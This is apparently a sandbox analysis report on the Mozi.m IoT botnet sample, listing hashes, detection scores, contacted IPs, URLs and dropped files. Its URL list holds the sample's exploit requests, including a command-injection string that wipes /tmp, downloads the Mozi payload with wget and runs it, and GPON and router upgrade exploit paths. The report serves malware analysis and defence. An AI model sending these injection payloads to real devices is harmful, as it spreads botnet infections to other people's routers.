Mozi.m

Status: finished

Submission Time: 2020-04-18 04:06:37 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
223572
API (Web) ID:
343774
Analysis Started:

2020-04-18 04:13:59 +02:00
Analysis Finished:

2020-04-18 04:20:21 +02:00
MD5:
4dde761681684d7edad4e5e1ffdb940b
SHA1:
2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:
d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 37/59

Open Full Report

malicious

Score: 16/40

malicious

Score: 17/31

malicious

IPs

IP	Country	Detection
193.244.238.30	Belgium
72.39.24.216	Canada
180.42.175.13	Japan
Click to see the 97 hidden entries
206.173.83.106	United States
192.35.0.92	Germany
108.51.91.191	United States
172.87.71.234	United States
181.239.131.245	Argentina
102.198.59.91	unknown
93.172.23.80	Israel
217.235.236.12	Germany
33.202.60.0	United States
23.211.48.163	United States
84.149.122.143	Germany
40.147.26.48	United States
154.254.205.149	Algeria
180.150.154.70	Hong Kong
134.223.61.194	United States
119.188.237.73	China
106.223.244.219	India
186.152.63.3	Argentina
114.38.29.88	Taiwan; Republic of China (ROC)
14.217.152.122	China
36.169.232.142	China
198.63.223.18	United States
122.192.87.154	China
17.214.34.82	United States
133.96.145.108	Japan
201.46.108.133	Brazil
126.61.72.21	Japan
67.15.158.199	United States
207.197.204.169	United States
59.130.19.120	Japan
31.153.102.174	Cyprus
186.73.128.134	Panama
121.81.89.53	Japan
175.204.170.254	Korea Republic of
59.231.6.164	China
85.28.108.59	Belgium
155.192.57.242	United Kingdom
210.46.240.135	China
75.93.248.204	United States
29.148.78.9	United States
183.152.62.176	China
169.94.115.105	United States
42.221.186.50	China
197.247.16.39	Morocco
93.6.182.216	France
20.131.14.220	United States
106.35.164.138	China
103.48.172.242	Singapore
157.112.112.65	Japan
84.230.41.24	Finland
195.210.216.85	Slovenia
87.206.18.160	Poland
203.146.247.32	Thailand
59.234.9.28	China
123.84.135.181	China
162.97.56.103	United States
143.254.97.103	United States
220.151.17.245	Japan
193.255.241.165	Turkey
117.134.136.0	China
158.207.88.36	Japan
166.16.184.92	United States
116.172.195.198	China
30.42.137.70	United States
174.84.199.225	United States
83.93.161.214	Denmark
107.17.20.226	United States
22.203.55.94	United States
51.224.248.121	United States
207.50.71.81	United States
105.183.58.80	Egypt
190.106.22.52	Nicaragua
5.246.159.230	Saudi Arabia
60.34.61.173	Japan
169.218.153.44	Korea Republic of
68.119.235.88	United States
101.55.107.91	Korea Republic of
213.138.46.35	Germany
14.61.28.62	Korea Republic of
112.172.125.18	Korea Republic of
154.25.116.201	United States
148.157.33.158	United States
184.15.73.194	United States
2.161.40.172	Germany
193.139.50.184	France
209.158.3.78	United States
83.105.236.18	United Kingdom
33.181.210.186	United States
65.20.96.146	United States
53.151.74.223	Germany
221.2.79.8	China
18.41.244.89	United States
201.55.29.56	Brazil
220.1.137.157	Japan
189.89.132.13	Brazil
4.215.118.130	United States
56.6.125.239	United States

URLs

Name	Detection
http://130.230.140.186:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://207.244.67.87:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
Click to see the 17 hidden entries
http://213.9.6.23:80/HNAP1/
http://103.61.145.50:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://154.93.26.215:80/HNAP1/
http://www.alsa-project.org.
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://115.77.118.80:49152/soap.cgi?service=WANIPConn1
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://www.pastebin.ca.
http://upx.sf.net
http://192.186.22.243:37215/ctrlt/DeviceUpgrade_1
http://www.alsa-project.org/alsa-info.sh
http://www.pastebin.ca
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca)

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

Mozi.m

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Mozi.m Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

Mozi.m